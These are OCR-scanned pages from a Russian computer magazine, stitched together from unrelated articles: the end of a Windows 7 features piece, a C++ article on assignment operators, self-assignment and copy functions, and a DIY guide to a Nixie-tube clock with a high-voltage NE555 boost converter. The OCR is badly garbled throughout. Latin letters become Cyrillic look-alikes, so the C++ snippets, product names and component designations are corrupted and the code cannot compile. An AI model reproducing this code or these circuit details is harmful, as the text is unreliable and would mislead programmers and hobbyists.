(расширение функционала ВкБоскег) . Похожий по 
названию, но отличный по назначению Арріоскег 
предотвращает запуск морально устаревшего ПО, 
версии которого могут содержать критические 
бреши в безопасности. 

Принципиально новой функцией, существенно уси- 
ливающей безопасность, является служба ѴѴіпсіоѵѵз 
Віотеггіс Зегѵісе, которая выступает в качестве 
средства связывания клиенстких приложений с 
устройствами биометрической защиты. Ранее для 
этого требовалось внедрение дополнительных 
драйверов, компонентов, поставляемых со стороны 
вендора. ѴѴіпсіоѵѵз 7 является первой операционной 
системой, позволяющей удостовериться в безопас- 
ности соединения с сервером БПЗ и в том, что на 
сервере выполняется проверка Б^ЗЕС от его име- 
ни. Хотя технология Б^ЗЕС еще не столь обжита, 
тем не менее, она есть на ряде ресурсов российских 
регистраторов. 




выпусках (или в СобеРІех] будет больше рабочих дей- 
ствий, стем, чтобы уменьшить необходимость в разра- 
ботке собственных. Поскольку «Майкрософт» использует 
СобеРІех, пользователям предоставляется хорошая 
возможность донести, какие дополнительные действия 
они хотят видеть. 

.ЫЕТ Ргатеѵѵогк 4.0 также предоставляет некоторые 
новые действия рабочей среды для вызова методов СЕР 
(МеОзосІІпѵоке], для выделения значений переменным 
рабочего процесса (Аззідп) и для прямого сохранения рабо- 
тающего экземпляра рабочего процесса (Регзізі:]. 

ЗАКЛЮЧЕНИЕ 

В статье я не затронул и половины всех новых возмож- 
ностей, которые представлены куслугам программиста в 
новой ѴѴіпсІоѵѵз 7. 

Эта операционная система предлагает столько новых функ- 
циональных возможностей, что голова идет кругом. И что-то 
подсказывает мне, мой друг, что пора, пора делать выбор в 
пользу ѴѴіпсІоѵѵз 7! ~і~ 
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КОДЕРСКИЕ 

ТИПСЫИТРИКСЫ 

Три правила кодинга на С++ для настоящих спецов 

В ПРОШЛОМ НОМЕРЕ МЫ СНОВА НАЧАЛИ ЗНАКОМИТЬСЯ С 
НЕБОЛЬШИМИ ТРЮКАМИ И ПРАВИЛАМИ КОДИНГА НА С++. В ЭТОЙ 
СТАТЬЕ МЫ ПРОДОЛЖИМ ИЗУЧАТЬ ПОДВОДНЫЕ КАМНИ ЭТОГО 
ОБЪЕКТНО-ОРИЕНТИРОВАННОГО ЯЗЫКА ПРОГРАММИРОВАНИЯ. ЕСЛИ 
ТЫ ХОЧЕШЬ ПИСАТЬ ПО-НАСТОЯЩЕМУ КАЧЕСТВЕННЫЕ ПРОГРАММЫ. 
ТО ОБЯЗАТЕЛЬНО ПРОЧТИ СЛЕДУЮЩИЕ ПАРУ СТРАНИЦ. 



Сегодня мы поговорим об операторе при- 
сваивания в языке С++. Казалось бы, что 
такого страшного может быть в этом малень- 
ком знаке «=»? А нет, даже тут великий СРР 
готовит нам свои сюрпризы. Итак, поехали. 

ПРАВИЛО №1 

Одно из интересных свойств присваивания 
в С++ заключается в том, что его можно 



выполнять последовательно. Крометого, 
оператор присваивания правоассоциати- 
вен. Что это значит? Продемонстрируем 
следующий КОД: 

ЧУДЕСНЫЙ ОПЕРАТОР ПРИСВАИВАНИЯ 

іпС х,у , 2 ; 

х = у= 2 = 15; 



/ / Строка выше и строка ниже - в 
принципе , одно и то же . 

// Скобки показывают последователь 
ность выполнения присваиваний 
х = (у = (2 = 15) ) ; 

Здесь переменной 2 присваивается зна- 
чение 15, затем результат присваивания 
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(новое значением) присваивается переменной у, после чего новое 
значение у присваивается переменной х. Достигается это за счет 
того, что оператор присваивания возвращает ссылку на свой левый 
аргумент, и этому соглашению мы должны следовать при реализа- 
ции операторов присваивания в своих классах. 



ОПЕРАТОР «=» В СВОИХ КЛАССАХ 

I сіазз Ѵ7іс3.де1с { 

риЫіс : 

// Возвращаемый тип — ссылка на текущий класс 
Міс1деб& орегаСог= (сопзС Шс1деб& гЪ.з) 

{ 

// возвращаем объект из левой части выражения 
гебигп *СІііз ; 

} 

} ; 

Это соглашение касается всех операторов присваивания, а не толь- 
ко стандартной его формы. Так, например, для операторов += и = с 
приведением типа аргумента их определение будет вы глядеть так: 

ОПРЕДЕЛЕНИЕ НЕСТАНДАРТНЫХ ОПЕРАТОРОВ ПРИСВАИВАНИЯ 

сіазз Ыбдеб { 
риЫіс : 

// Соглашение распространяется на +=, -= и т.д. 

ЫбдеЫ орегабог+= (сопзб ОДісІде1і& гііз) 

{ 

гебигп ЧМз; 

} 

// это относится даже к параметрам разных типов 
Міс1деб& орегабог= ( іпб гйз) 

{ 

гебигп ЧМз; 

} 

} ; 

Это всего лишь соглашение и, если мы не будем его придерживать- 
ся, наша программа все равно будет скомпилирована. Но этому 
соглашению следуют все встроенные типы и типы стандартной 
библиотеки, такие как зіхіпд, ѵесіог и т.д. Если унаснетвеской при- 
чины нарушать его, лучше этого и не делать. 

Из первого правила нам нужно запомнить, что оператор присваива- 
ния следует писать так, чтобы он возвращал ссылку на *{Ыз. 

ПРАВИЛО №2 

Во втором правиле мы узнаем, что может случиться, если не 
осуществлять проверку на присваивание самому себе. Некоторые 



спросят: «Кактакое возможно?». Можешь не сомневаться, вероят- 
ность такого присваивания очень высока. Следующий кусок кода 
покажет разные ситуации, в которых присваивание самому себе 
осуществимо: 

ПОТЕНЦИАЛЬНОЕ ПРИСВАИВАНИЕ САМОМУ СЕБЕ 

сіазз Ыбдеб {...}; 

Мбдеб ѵг; 

// очевидное присваивание самому себе 
ѵі = ѵі; 

//а это уже менее очевидно 
а ІІЗ = аШ ; 

*рх = *ру; 

Эти не совсем очевидные случаи присваивания себе являют- 
ся результатом так называемого совмещения имен (аііазіпд), 
когда на один и тот же объект ссылаются несколькими разными 
способами. Программа, которая оперирует ссылками или ука- 
зателями на объекты одного и того же типа, должна считаться 
с тем, что эти объекты могут совпадать. Необязательно даже, 
чтобы два объекта имели одинаковый тип. Если они принад- 
лежат к одной иерархии классов, то ссылка или указатель на 
базовый класс могут в действительности относиться к произво- 
дному классу. 

ЕЩЕ ОДНО ПРИСВАИВАНИЕ СЕБЕ 

сіазз Вазе {...}; 

сіазз Бегіѵеб: риЫіс Вазе {...}; 

// гЬ и *рЬ могут быть одним и тем же объектом 
ѵоіб боЗошебМпд ( сопзб. Вазе& гЬ, Бегеѵеб *рЬ) ; 

Если мы будем писать объект для управления ресурсами, о 
котором я рассказывал в прошлой статье, то нам непременно 
придется подумать о безопасности присваивания. Может сло- 
житься ситуация, в которой мы случайно освободим ресурс до его 
использования. Предположим, что мы создали класс, который со- 
держит указатель на динамический объект класса Вйтар. Ниже 
приведена реализация оператора присваивания, которая на 
первый взгляд кажется совершенно нормальной, но становится 
опасной в случае присваивания самому себе или при возникно- 
вении исключения. 

ОПАСНЫЙ ОРЕКАТОК= 

сіазз Вібтар 

сіазз Ыбдеб { 

ргіѵабе : 

В і Стар *рЬ; 

} ; 
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ШДде&& ЭДісІдеЦ : : орегаСог= (сопзі ШісідеЦ& гііз) 

{ 

сІеІеСе рЬ; 

рЬ = пем ВіРшар ( *г!із . рЬ) ; 

геСигп ЧЫз; 

} 

Проблема в том, что в теле орегаіог= *1Ыз (чему присваивается 
значение) и гЬз (что присваивается) могут оказаться одним и тем 
же объектом. В этом случае беіеіе удалит не только старый Віітар, 
принадлежащий текущему объекту, но и новый, который мы хотим 
присвоить. В результате, по завершению выполнения кода опера- 
тора мы получим в рЬ указатель на несуществующий объект, хотя 
рассчитывали там увидеть совсем другое. 

Традиционный способ решить эту проблему состоит в том, чтобы 
в начале о ре га Ію г= выполнить проверку на присваивание самому 
себе: 

ПРОВЕРКА НА ПРИСВАИВАНИЕ СЕБЕ 

Мс1деР& ШісІдеР : : орегаіог= (сопзі ШійдеС& гііз) 

{ 

// проверка на совпадение 

ІТ (Діііз == &гЪ.з) геСигп ЧМз; 

сІеІеСе рЪ; 

рЬ = пем ВіРтар ( *г!із .рЬ) ; 

геСшгп *СІііз; 

} 

Такая проверка позволяет избежать ошибки, описанной выше, но 
есть еще проблема с безопасностью в контексте исключений. Напри- 
мер, выражение пеѵѵ Віітар может вызвать исключение по причине 
недостатка свободной памяти, или исключение возбудит конструктор 
копирования Віітар. При таком развитии событий ѴѴібдеі также 
будет содержать указатель на несуществующий Віітар. Подобные 
указатели — главные причины того, что многие программисты про- 
водят долгие часы в компании отладчика. Но существует способ 
сделать реализацию орегаіог= одновременно безопасной в плане 
исключений и безопасной по части присваивания самому себе. Спо- 
соб достаточно прост — надо лишь провести серию присваиваний в 
правильном порядке. Следующий кусок кода безопасен и в контексте 
исключений, и в контексте присваивания себе: 

ПОЛНОСТЬЮ БЕЗОПАСНЫЙ КОД 

МсідеЦ& VI ісідеЦ : : орегаСог= (сопзС Міс1деЦ& гііз) 

{ 

ВіСшар *рОгід = рЬ; 

рЬ = пеѵт ВіРтар ( *г!із .рЪ) ; 

сіеіеіе рОгід; 

геСигп *СІііз; 

} 

Здесь мы просто не удаляем рЬ до тех пор, пока не скопируем то, 
на что он указывает. Теперь, если пеѵѵ Віітар возбудит исклю- 
чение, то рЬ (а также и объект ѴѴі б деі, которому он принадлежит) 
останется неизменным. Даже без проверки на совпадение здесь 
обрабатывается присваивание самому себе, так как мы сделали 
копию исходного объекта Віітар, удалили его, а затем направили 
указатель на сделанную копию. Кстати, применение такого подхода 
в большинстве случаев оправдано также и с точки зрения произво- 
дительности. А вот вопрос «почему так?», — и будет твоим домаш- 
ним заданием. 



Альтернативой ручному упорядочиванию инструкций в орегаіог= 
может быть обеспечение безопасности в контексте исключений и 
присваивания самому себе за счет применения техники «копиро- 
вания с обменом» («сору а пб зѵѵар»). Это достаточно распростра- 
ненный способ написать оператор присваивания, и на него стоит 
взглянуть: 

«СОРѴАМББѴѴАР» 

сіазз МсІдеЪ { 

ѵоісі змар (Міс1деЦ& гііз) ; 

} 

Мс1деЦ& ЭДісІдеЦ : : орегаСог= (сопзС Міс1деЦ& гііз) 

{ 

МісІдеЦ Сешр(гііз) ; 

змар (Сешр) ; 
геСигп *СІііз; 

} 

Здесь оператор присваивания можно объявить как принимающий 
аргумент по значению, а передача объекта по значению — фактиче- 
ски создание копии этого объекта. 

Надо запомнить, что всегда следует убеждаться в правильности 
поведения орега1:ог=, когда объект присваивается самому себе. Для 
этого можно сравнить адреса исходного и целевого объектов, акку- 
ратно упорядочить инструкции или применить идиому копирования 
обменом. Также следуетубедиться, что все функции, оперирующие 
более чем одним объектом, ведут себя корректно при совпадении 
этих объектов. 

ПРАВИЛО №3 

В хорошо спроектированных объектно-ориентированных про- 
граммах, которые инкапсулируют внутреннее устройство объ- 
ектов, копированием занимаются только две функции: оператор 
присваивания и конструктор копирования. Назовем их функция- 
ми копирования. Если мы самостоятельно не определяем по- 
ведение этих функций, то компилятор сгенерирует их код за нас. 
Эти автоматически созданные функции ведут себя в точности 
так, как мы это от них ожидаем — копируют все данные исходного 
объекта. 

В случае, когда мы сами решаем написать код копирующих функ- 
ций, компилятор снимет с себя всю ответственность и не будет 
следить за тем, насколько полно мы копируем данные объекта. 
Рассмотрим следующий код, который реализует класс, представ- 
ляющий заказчиков. Функции копирования в этом классе написаны 
вручную, и каждый их вызов протоколируется: 

КЛАСС СІІ5Т0МЕВ 

// делает запись в протокол 

ѵоісі ІодСаІІ (сопзС зСсІ: : зСгіпд& іипсЫаше) ; 

сіазз СизСошег { 
риЫіс : 

СизСошег (сопзС СизСотег& гііз) ; 

СизСотег& орегаіог= (сопзі СизСотег& гііз) ; 

ргіѵаіе : 

зСсі: : зСгіпд пате; 

}; 
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Сизботег: :Сизботег (сопзб Сизботег& гЬз) 

: пате (гЬз .пате) 

{ 

ІодСаІІ ( "Конструктор копирования Сизботег" ) ; 

} 

Сизботег& Сизботег: : орегабог= (сопзб Сизботег& гЪ.з) 

{ 

ІодСаІІ ( "Копирующий оператор присвоения 
Сизботег" ) ; 

пате = пЬз.пате; 
гебигп бМз; 

} 

Все выглядит отлично. И на самом деле так оно и есть, до тех пор, 
пока мы не добавим в класс новый член. С этого момента сущес- 
твующие функции копирования копируюттолько часть объекта. 
Большинство компиляторов не выдадут никакого предупреждения, 
даже на самом высоком уровне диагностики. Решение тут очевидно 
— надо переписать конструктор копирования и все операторы при- 
сваивания. Казалось бы, задача достаточно проста, и про обнов- 
ление копирующих функций не вспомнит только дурень, но поверь 
мне, это не совсем так. Есть еще более коварные случаи проявления 
такой ситуации. Например, наследование: 

НАСЛЕДОВАНИЕ И КОПИРУЮЩИЕ ФУНКЦИИ 

сіазз РгіогібуСизботег : риЫіс Сизботег { 

риЫіс : 

РгіогібуСизботег (сопзб РгіогібуСизботег& гЬз) ; 
РгіогібуСизботег& орегабог= ( 
сопзб РгіогібуСизботег& гйз) ; 

ргіѵабе : 

іпб ргіогібу; 

} ; 

РгіогібуСизботег : : РгіогібуСизботег 
(сопзб РгіогібуСизботег& гйз) 

: ргіогібу (гЬз .ргіогібу) 

{ 

ІодСаІІ ( "Конструктор копирования РгіогібуСизботег " ) ; 

} 

РгіогібуСизботег& РгіогібуСизботег: :орегабог=( 
сопзб РгіогібуСизботег& гйз) 

{ 

ІодСаІІ ( "Копирующий оператор присвоения 
РгіогібуСизботег") ; 

ргіогібу = гйз .ргіогібу ; 
гебигп бЫз| 

} 

На первый взгляд копирующие функции в классе РгіогКуСизІютег 
обрабатывают все его члены, но на деле копируются только 
данные, объявленные в РгіогКуСизІютег. Однако каждый объект 
РгіогКуСизІюте г содержит члены, унаследованные от Сизіютег, а 
они-то и не копируются! Конструктор копирования РгіогКуСизІютег 
не упоминает в своем списке инициализации члены Сизіютег, 
поэтому эти данные будут инициализированы конструктором по 
умолчанию класса Сизіютег. 



Для оператора присваивания РгіогКуСизІютег ситуация ничуть 
не лучше. Он не выполняет попыток инициализировать данные- 
члены базового класса, поэтому они остаются неизменными. Чтобы 
решить проблему, надо скопировать части базового класса. Обычно 
они находятся в закрытом разделе класса, поэтому копирующие 
функции производного класса должны вызывать соответствующие 
функции базового класса: 

ПРАВИЛЬНЫЕ КОПИРУЮЩИЕ ФУНКЦИИ 

РгіогібуСизботег : : РгіогібуСизботег 
(сопзб РгіогібуСизботег& г\Ьз) 

// вызываем копирующий конструктор 
// базового класса 
: Сизботег (гЬз ) , 
ргіогібу (гЪ.з .ргіогібу) 

{ 

ІодСаІІ ( 

"Конструктор копирования РгіогібуСизботег " ) ; 

} 

РгіогібуСизботег& 

РгіогібуСизботег: :орегабог= 

(сопзб РгіогібуСизботег& г\Ьз) 

{ 

ІодСаІІ ( "Копирующий оператор присвоения 
РгіогібуСизботег") ; 

// присваиваем значение данным-членам 
// базового класса 
Сизботег: :орегабог= (гйз) ; 

ргіогібу = гЪ.з .ргіогібу ; 
гебигп бЬ.із; 

} 

Часто код в конструкторе копирования и операторе присваивания 
совпадает, и может возникнуть желание использовать одну функ- 
цию в теле другой для предотвращения дублирования кода. Ноя 
настоятельно не советую этого делать. 

Нет смысла вызывать конструктор копирования из оператора 
присваивания, поскольку тем самым мы пытаемся создать объект, 
который уже существует. Попытка выполнить обратную операцию — 
из конструктора копирования вызвать оператор присваивания 
также бессмысленна. Конструктор инициализирует новые объ- 
екты, а оператор присваивания работает с уже существующими 
экземплярами. 

Разумеется, есть способ избежать дублирования кода, и он доста- 
точно прост. Надо лишь создать закрытую функцию-член, которая 
будет выполнять этот дублирующийся код. Конструктор копирова- 
ния и оператор присваивания будут вызывать эту функцию в своем 
теле. 

Из третьего правила надо запомнить, что копирующие функции 
должны гарантировать копирование всех членов-данных объекта и 
частей его базовых классов. Не пытайся реализовать одну из функ- 
ций копирования через другую. Вместо этого лучше создать общую 
функцию и поместить в нее нужную функциональность. 

ЗАКЛЮЧЕНИЕ 

Вроде бы, такие простые вещи, как присваивание и копирование, 
не должны иметь подводных камней. Однако программирование 
— дело не такое простое, как иногда кажется. Многие особенности 
языка С++ начинают всплывать, только если разрабатывать по- 
настоящему серьезные программы, т 
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КАК ВЫГЛЯДИТ БОЛЬШИНСТВО СОВРЕМЕННЫХ ЭЛЕКТРОННЫХ 
ЧАСОВ? ЛЕГКО ПРЕДСТАВИТЬ - ПЛАСТМАССОВЫЙ КОРПУС. 
СЕГМЕНТНЫЕ ЦИФРЫ НА СЕРОМ ЖК-ТАБЛО... ИЛИ СВЕТЯЩИЕСЯ 
НА СВЕТОДИОДНОМ. БЕЗ РАЗНИЦЫ - ВСЕ ОНИ ОЧЕНЬ ОБЫДЕННЫ И 
ПОХОЖИ ДРУГ НА ДРУГА. КАК ДВЕ КАПЛИ ВОДЫ. ДЛЯ ИЗГОТОВЛЕНИЯ 
НАШИХ ЧАСОВ МЫ ОБРАТИМСЯ К ЭПОХЕ КИБЕРНЕТИКИ. И СДЕЛАЕМ 
ИХ ПО САМЫМ НЕСОВРЕМЕННЫМ ТЕХНОЛОГИЯМ! 



НЕОНОВЫЕ ИНДИКАТОРЫ 

Прототипы неоновых индикаторов, всемирно известных как ІМІХІЕ, были 
разработаны в небольшой лаборатории производителя электроваку- 
умных приборов Науби ВгоіНегз І_аЬогаІогіе5, которую впоследствии 
выкупила фирма ВиггоидЬз Согрогабоп вместе с принадлежащей ей 
торговой маркой N ІХІ Е. А в 1954 году индикаторы были представлены на 
рынок. Название N ІХІ Е было получено из аббревиатуры «N1X1» (Ыитегіс 
ІпсІісаІюгеХрегітепіаІ Ыо. 1 ), и прочно укрепилось в обиходе для обозна- 
чения неоновых газоразрядных индикаторов. 

Надозаметить, что первые серийные индикаторы появилисьеще в 
1930-х годах, но в то время их применение было сильно ограничено 
грубой конструкцией самих приборов и еще недостаточно развитой 
элементной базой. А самые первые приборы индикации, работающие на 
основе принципа тлеющего разряда, были запатентованы в 1 920 году, 
когда после изобретения радиоламп началось мощное и интенсивное 
изучение электрических процессов в вакууме и сильноразреженных 
газах. 

ПРИНЦИП РАБОТЫ ШХІЕ 

Неоновые индикаторы — это газоразрядные приборы низкого давле- 
ния, работающие на основе процессов тлеющего разряда. Прежде чем 
приступить кобъяснению принципа работы газоразрядных приборов, 
рассмотрим процесс прохождения электрического тока в газе. 

Под действием сильного электрического поля с атомов инертного газа 
срываются электроны, которые устремляются каноду, а оставшиеся 
положительно заряженные ионы направляются к катоду. Этот процесс 
называется пробоем газового столба. Затем, в результате интенсивной 
бомбардировки катода положительными ионами, начинается вторичная 
электронная эмиссия, и возникаетустойчивый тлеющий разряд. 
Одновременно с процессом ионизации газа происходит и обратное 



явление, при котором ионы превращаются в нейтральные атомы. 
Превращение ионов газа в нейтральные атомы называется рекомбина- 
цией; при этом выделяется энергия, под действием которой происходит 
свечение ионизированного газа. 

Непосредственно к катоду 1 примыкаеттонкое, толщиной в доли милли- 
метра, астоново темное пространство 2. Здесь электроны, выбитые из 
катода, еще не успели приобрести скорости, достаточные для возбуж- 
дения атомов газа, поэтому в этой области свечения нет. Далее идет 
светящаяся пленка 3, в которой разогнанные электроны возбуждают, 
но еще не ионизируют атомы инертного газа. Возбужденные атомы 
испускают кванты света с характерным для этого газа цветом свечения. 
Так, тлеющий разряд в неоне сопровождается интенсивным красно- 
оранжевым светом. 

Затем следуеттемное катодное пространство 4, в котором начинаются 
процессы ионизации атомов, а также нарастаютэлектронные лавины. 
Образовавшиеся в этой области положительные ионы несутся назад, 
бомбардируя катод и вызывая вторичную электронную эмиссию. 
Большое количество быстрых лавинных электронов атакует следующий 
слой. Начинается он резкой светящейся границей и называется облас- 
тьютлеющего свечения 5. Здесь происходит рекомбинация электронов с 
положительными ионами. 

Тлеющее свечение постепенно переходитв фарадеевотемное 
пространство 6, куда быстрые электроны, рожденные электронными 
лавинами, уже недолетают. За этим пространством следует положитель- 
ный столб разряда 7, занимающий всю оставшуюся область до анода 
8 и светящийся благодаря процессам рекомбинации. Напряжение, 
при котором образуется тлеющий разряд, называется напряжением 
зажигания. Зависитоно отмножества факторов, таких каксостав газа, 
давление, расстояние между электродами, их материал и форма. 

В основу работы газоразрядных индикаторов положено явление светя- 
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ПРИНЦИП РАБОТЫ ПОВЫШАЮЩЕГО 
ПРЕОБРАЗОВАТЕЛЯ 



щейся пленки около катода. Неоновый индикатор представляет собой 
стеклянную колбу с набором запаянных в нее электродов, наполненную 
разряженным неоном. Анод изготавливается в виде стакана, накрытого 
сеткой, и на него подается положительное потенциал. Катоды в виде 
проволоки сформированы в одну из десяти арабских цифр и помещены 
внутрь стакана. Если на один из катодов подать отрицательный потенци- 
ал, инертный газ начинаетсветиться вокруг проволоки. Технологически 
давление внутри баллона подобранотак, чтобы свечение получалось 
равномерным и ярким. Таким образом, подавая напряжение на один из 
катодов, можно «высвечивать» любую цифру от 0 до 9. 

ИСТОЧНИК ПИТАНИЯ ДЛЯ N1X1 Е 

Для зажигания газа требуется высоковольтный источник питания. У раз- 
ных типов ламп напряжение зажигания может быть разным, но для всех 
неоновых индикаторов оно лежит в пределах 1 50-200 В. Раньшетакое 
напряжение снимали со вторичной обмотки габаритного и увесистого 
трансформатора, который одновременно питал и низковольтную часть 
прибора, но сейчас достать та кой специфичныйтрансформатор стано- 
вится весьма проблематично. 

С помощью современной электронной базы можно создать малога- 
баритный преобразователь, с меньшей стоимостью и более высоким 
КПД, который элементарно разместится в плоскости основной платы. 
Все устройство может питаться от низковольтного источника питания, 
например, готового импульсного блока питания, а высокое напряжение 
для N ІХІ Е будет получаться штатно непосредственно из низковольтного. 
Такой же принцип питания используется вЖК-дисплеях и многих других 
современных бытовых приборах. Разберемся в принципе работы повы- 
шающего преобразователя. 

Повышающий преобразователь состоит из источника питания В, дрос- 
селя \_, ключа 5ѴѴ, диода ѴЭ, накопительного конденсатора С и нагрузоч- 
ного сопротивления Р. 

При замыкании ключа 5ѴѴ (обозначено красным] дроссель Покажется 
напрямую подключенным кисточнику питания. В силу инерционности 
дросселя (фундаментальное свойство индуктивности] ток не может 
увеличиться скачкообразно, а будет нарастать линейно, при этом будет 
происходить накопление энергии магнитного поля. Напряжение вточке 
соединения диода ѴО и дросселя И равно нулю, поэтому диод закрыт. 
Подачутока в это время в нагрузку обеспечивает конденсатор С. 

При размыкании ключа 5ѴѴ (обозначено синим] ток не может мгновен- 
ноуменышиться, опять же в силу инерционности дросселя, и поэтому 
продолжает течь. Напряжение на катушке мгновенно увеличивается до 
уровня, обеспечивающего протеканиетока. В теории — хоть до беско- 
нечности, в реальности же произойдет искровой разряд через воздух. 

Но дроссель слева подключен к источнику питания, а справа через диод 
кнакопительному конденсатору с уже имеющимся некоторым зарядом. 
Таким образом, нарастание напряжения продолжится с напряжения, 
имеющегося на конденсаторе. Ток в дросселе при этом будет линейно 
уменьшаться, а напряжение на конденсаторе расти. 

Величина напряжения в пике зависит от нескольких факторов: индук- 



тивности дросселя, длительности открытого, закрытого состояния ключа 
и скорости его выключения. Величина пульсаций этого напряжения как 
параметр качества питания, в свою очередь, зависит от: емкости кон- 
денсатора, частоты работы ключа и тока потребляемого нагрузкой. 
Важно, чтобы ни при каких обстоятельствах сердечник дросселя не 
переходил в насыщение. Если это происходит, то дроссель уже не в 
состоянии накапливатьэнергию магнитного поля, а сопротивление его 
по постоя иному току становится крайне мало. Это означает, что в насы- 
щении мощный дроссель превращается в простой проводник, который 
замыкает через ключ источник питания. В результате КПД устройства 
резко падает, а ключ и источникпитания сильно разогреваются. В 
конечном счете, это приводит к выходу из строя ключа или источника пи- 
тания. Чтобы этого не произошло, нужно правильно выбрать параметры 
преобразователя. 

Итак, перед нами одна изтысяч схем повышающих преобразователей. 
Хочется сразу обратить внимание, что схема несколько нестандартна. 
Обычно для управления силовым ключом используется специальный 
ШИМ-контролер, например, МС34063. Здесь используется универ- 
сальный аналоговыйтаймер N Е555, а управление и стабилизация 
реализована с помощью частотной модуляции [1]. Интересно заметить, 
что многие специализированные микросхемы ШИМ-контролеров в 
своем сердце имеютвсетотже универсальный таймер. Разберемся, как 
работает преобразователь. 

Таймер ЫЕ555 включен как мультивибратор по стандартной схеме. Це- 
почкой Р5Р6С4 определяется частота и скважность импульсов. Таймер 
обеспечивает работу повышающего преобразователя ИѴТІѴОІСЗ. На 
резисторах Р1 Р2РЗ собран делитель напряжения, который вместе с ѴТ2 
и Р4 образуют цепь обратной связи. Вывод СО ЫТР-тай мера позволяет 
получить доступ копорному напряжению компаратора. Если транзистор 
ѴТ2 начинает открываться, то это приведет к притягиванию внутреннего 
опорного напряжения кземле, вследствие чего увеличивается частота 
генерации. Увеличение частоты при неизменных остальных элементах 
приводит куменьшению выходного напряжения. Это легко видно из 
уравнения баланса накопленной и расходуемой энергии [1]. 

В качестве ключа используется ІВЕ830 с максимальным напряжением 
500 В, максимальным током 4 А и сопротивлением канала 1 ,5 Ом. Диод 
высокочастотный ЕВ04 с обратным напряжением 400 В. Дроссель — 1 00 
мкГн, рассчитанный натокне менее4А. Для I В Е830 требуется также не- 
большой радиатор, так как в пике через него проходит весьма солидный 
ток. 

В цепи обратной связи используется высоковольтный транзистор ВЕ487, 
с максимальным напряжением коллектор -эмиттер 400 В. На самом 
деле, нет строгой необходимости использовать именно этот транзистор. 
Вместо него подойдет и любой другой низковольтный маломощный 
транзистор структуры п-р-п, например, ВС547. Но эта схема не имеет 
никаких цепей и средств защиты от короткихзамыканий или перегру- 
зок. В повышающих преобразователях без серьезного усложнения и 
вмешательства в основную цепь питания невозможно реализовать 
такую защиту. Как показала практика, нестандартные ситуации, имею- 
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СХЕМА ПОВЫШАЮЩЕГО ПРЕОБРАЗОВАТЕЛЯ НА 
ИЕ555 



щие место в основном на этапе макетирования и отладки, приводят к 
высоковольтному выбросу и выходу из строя именно этого транзистора, 
поэтому его применение оправдано. 

В качестве повышающего преобразователя можно использовать и 
другую схему, скажем, на той же МС34063, но описанная выше — самая 
простая и неприхотливая. К тому же, трудностей с доставанием ЫЕ555 по 
определению быть не может, это очень распространенная микросхема. 
Подробнее о методике расчета импульсных источников питания читай в 
книге Раймонда Мэка «Импульсные источники питания. Теоретические 




ПОДКЛЮЧЕНИЕ ИНДИКАТОРА ИН-1 К МИКРОСХЕМЕ 
К155ИД1 



основы проектирования и руководство по практическому применению». 



УПРАВЛЕНИЕ ШХІЕ 

Итак, в нашем распоряжении — 4 газоразрядных индикатора ИН-1 и 2 
неоновые лампочки ИН-3 в качестве мигающихточек, атакже источник 
питания для всего этого. Осталось на каждом индикаторе зажечь цифру 
в соответствии стекущим временем, то есть один из десяти электродов 
каждой лампы замыкать на землю. Можно использовать 40 маломощных 
высоковольтныхтранзисторов, а можно сделать по-другому... 

В свое время, специально для работы с газоразрядными индикато- 
рами, была разработана микросхема 5Ы74141 (отечественный аналог 
К1 55ИД1 ). Она представляет собой дешифратор двоично-десятичного 
кода в десятичный, который позволяет преобразовать четырехразряд- 
ный код, поступающий на входы АО-АЗ, в напряжение низкого логичес- 
кого уровня, появляющееся на одном из десяти выходов 0-9. Каждый 
десятичный выход снабжен высоковольтным транзистором с открытым 
коллектором. Другими словами, катоды неоновых индикаторов можно 
напрямую подключать кодноименным выводам этой микросхемы. 
Управление самим индикатором сводится кподаче двоичного кода 
зажигаемой цифры на четыре адресные линии дешифратора. 

Несмотря на то, что это очень олдскульная микросхема, в бывшем СССР 
их, а также сами индикаторы серии ИН, выпускали вплоть до 87 года (!], в 
то время какза рубежом от них давно отказались. Поэтому во всем мире 
это «советское добро» сей час достать легче, чем брендовые аналоги. 
Крометого, стоимость таких четырех микросхем не сравнится со стои- 
мостью четырех десятков высоковольтныхтранзисторов (40 руб. против 
400]. 

В качествеуправляющего контролера выбран АѴР-микроконтроллер 
АТ0пу26 фирмы АТМЕІ_. Описание принципа работы и архитектуры этих 
микроконтроллеров не входитв рамки статьи — потеме естьогромное 
количество информации. Строго говоря, для наших целей лучше бы 
подошел АТтеда8. Но рассмотрим другой вариант, ктомуже неуступаю- 
щий в цене. 

Для управления индикаторами нам нужно 16 выводов (4индикатора 
по 4 линии), еще один вывод нужен для мигающихточек, два будут 
задействованы для кварца, и еще два вывода потребуется для кнопок. 
Итого — 21 вывод. Для наращивания недостающих выводов используем 
внешний 8-битный регистр-защелку 5ІМ74Е5373 (отечественный аналог 
КР1 533ИР22], и подключим его параллельно основному порту А, а один 
выводе порта В используем для фиксации. Индикаторы подключают- 
ся парами — одна пара к регистру-защелке, другая к контроллеру. 
Теперь для установки всех четырех цифр на неоновых индикаторах 
нужно выполнить следующую последовательность: 1 ] установить 



на выводе 5ТВ регистра -за щелки лог. 1 . ; 2] записать в порт А коды 
единиц и коды десятков часов; 3) установить на выводе 5ТВ лог. 

0, тем самым, зафиксировать данные в нем ; 4] записать в порт А 
коды единиц и коды десятков минут. Вся эта последовательность 
выполнится микроконтроллером за несколько микросекунд. 

Блок питания выполнен по классической схеме. В качестве сете- 
вого трансформатора используется компактный 7-ватный ТТП- 
1 1 0. С выпрямителя В 0 1 С 1 С 2 нестабилизированное напряжение 
12 В подается на повышающий преобразователь и линейный 
стабилизатор Б7805, обеспечивающий питанием цифровую часть 
схемы. Все остальные блоки, за исключением самих индикаторов, 
установка которых планируется на переднюю панель, размещены 
на одной односторонней печатной плате. Кнопки настройки и 
установки часов будут расположены на задней панели вместе с 
разъемом питания и конструктивно объединены с І5Р-разъемом 
программирования микроконтроллера. 

Полный вариант схемы с рисунком печатной платы, фотошаблона- 
ми, исходниками и готовой прошивкой ищи на диске. 

КОРПУС ДЛЯ ШХІЕ 

Изготовив такие часы на старомодных неоновых индикаторах, не- 
солидно было бы поместить их в какую-нибудь банальную пласти- 
ковую коробку. ИН-1 — это первые отечественные газоразрядные 
индикаторы из эпохи кибернетики. Почти все они кривые, косые и 
выполнены весьма брутально, поэтому требуют соответствующего 
корпуса... в идеале, из черного бакелита с палец тол щиной, или 
из бетона, как, например, уча со в ІЧІХІЕСопсгеіеСІоск.УДаниеля 
Курта это был всего лишь концепт, мы же превратим его в жизнь! 
Поскольку корпус претендует на право быть фундаментальным, то 
и делать мы его будем по всем правилам изготовления фундамен- 
тов. 

